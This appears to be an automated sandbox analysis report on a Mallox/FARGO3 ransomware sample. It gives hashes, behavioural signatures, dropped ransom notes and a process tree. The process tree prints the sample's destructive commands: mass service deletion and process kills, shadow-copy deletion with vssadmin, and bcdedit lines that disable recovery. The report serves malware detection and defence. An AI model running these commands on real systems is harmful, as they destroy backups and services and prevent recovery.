Analysis

max time kernel: 137s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-10-2022 02:20
Behavioral task: behavioral1
Sample: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
Resource: win7-20220901-en

Behavioral task: behavioral2
Sample: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
Resource: win10v2004-20220901-en
General

Target: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
Size: 159KB
MD5: ddce5db099bab8bc56d5ac70d83842a0
SHA1: 7cd97f3e7a64cf10727ffff9634b9f2f0ed69c9d
SHA256: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd
SHA512: 859801169bd7f26f6918ecea0aee1c9473ac25dc74c861642efd428f6c2d3644d5f64d7113da1d96120b8eca4ee0dcfb26f082c2c8d1a63a8252713ab3fb9c23
SSDEEP: 3072:HfCpcDozERHWkC1rd3CC5UB5KvSS0+9Pzo9p04/t9LU5Uht9e8A+BVfRbixvJ+L:HfCpc/RHcQC50e0QPCiEtVvthAJg
Malware Config

Extracted
  Path: C:\$Recycle.Bin\S-1-5-21-929662420-1054238289-2961194603-1000\RECOVERY FILES.txt
  URL: https://twitter.com/mallox_leaks
Signatures

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Modifies extensions of user files (4 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process for all entries: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  - File renamed: C:\Users\Admin\Pictures\UnprotectResolve.raw => C:\Users\Admin\Pictures\UnprotectResolve.raw.FARGO3
  - File opened for modification: C:\Users\Admin\Pictures\CopyCompare.tiff
  - File renamed: C:\Users\Admin\Pictures\CopyCompare.tiff => C:\Users\Admin\Pictures\CopyCompare.tiff.FARGO3
  - File renamed: C:\Users\Admin\Pictures\SkipTrace.tif => C:\Users\Admin\Pictures\SkipTrace.tif.FARGO3

Stops running service(s) (3 TTPs)

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation (process: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe)

Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Process for all entries: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  File opened (read-only), in the order reported:
  \??\G: \??\H: \??\I: \??\M: \??\N: \??\Q: \??\U: \??\V: \??\Y: \??\A: \??\R: \??\B: \??\E: \??\J: \??\L: \??\P: \??\S: \??\T: \??\W: \??\Z: \??\F: \??\K: \??\O: \??\X:
Drops file in Program Files directory (64 IoCs)
  Process for all entries: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Fonts\SkypeAssets-Bold.ttf
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODF
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\offsymxl.ttf
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-200_contrast-black.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_altform-unplated_contrast-black_devicefamily-colorfulunplated.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js
  - File created: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\RECOVERY FILES.txt
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY FILES.txt
  - File created: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EBWebView\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms
  - File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-125.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_contrast-white.png
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-pl.xrm-ms
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\CommonCapabilities.json
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\common.lua
  - File created: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-36_altform-colorize.png
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\networkmanifest.xml
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar
  - File opened for modification: C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_sv.properties
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ATPVBAEN.XLAM
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Date.targetsize-20_contrast-white.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-125.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-96.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-GoogleCloudCacheMini.scale-150.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIF
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-200.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js
  - File created: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\AppxMetadata\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-125_contrast-white.png
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Grace-ul-oob.xrm-ms
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms
  - File opened for modification: C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo
  - File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY FILES.txt
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY FILES.txt
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_contrast-black.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\RECOVERY FILES.txt
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\LockScreenLogo.scale-200.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.contrast-black.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\Doughboy.scale-100.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\archives\data-80bd83b592567d50f84a26711cad1cf82f4057f1.archive
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.scale-100.png
  - File opened for modification: C:\Program Files\7-Zip\Lang\tt.txt
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-ppd.xrm-ms
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-72_altform-lightunplated.png
Launches sc.exe (1 IoC)
  Sc.exe is a Windows utility to control services on the system.
  - PID 4944: sc.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  - PID 652: vssadmin.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  - PID 3080: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  - PID 3080: 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  - Token: SeTakeOwnershipPrivilege, PID 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  - Token: SeDebugPrivilege, PID 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  - Token: SeBackupPrivilege, PID 3164, vssvc.exe
  - Token: SeRestorePrivilege, PID 3164, vssvc.exe
  - Token: SeAuditPrivilege, PID 3164, vssvc.exe

Suspicious use of WriteProcessMemory (14 IoCs)
  Columns: description, pid, process, procid_target
  - PID 3080 wrote to memory of 4452, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 78
  - PID 3080 wrote to memory of 4452, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 78
  - PID 3080 wrote to memory of 4452, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 78
  - PID 3080 wrote to memory of 652, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 84
  - PID 3080 wrote to memory of 652, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 84
  - PID 3080 wrote to memory of 3120, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 85
  - PID 3080 wrote to memory of 3120, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 85
  - PID 3080 wrote to memory of 3120, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 85
  - PID 3080 wrote to memory of 1536, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 82
  - PID 3080 wrote to memory of 1536, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 82
  - PID 3080 wrote to memory of 1536, 3080, 2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe, 82
  - PID 4452 wrote to memory of 4944, 4452, cmd.exe, 86
  - PID 4452 wrote to memory of 4944, 4452, cmd.exe, 86
  - PID 4452 wrote to memory of 4944, 4452, cmd.exe, 86
Processes
(process tree; depth shown by indentation)

C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe"
  PID: 3080
  - Modifies extensions of user files
  - Checks computer location settings
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer
      PID: 4452
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete MsDtsServer100
          PID: 4944
          - Launches sc.exe

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      PID: 1536

    C:\Windows\system32\vssadmin.exe
      Command line: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
      PID: 652
      - Interacts with shadow copies

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      PID: 3120

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 3164
  - Suspicious use of AdjustPrivilegeToken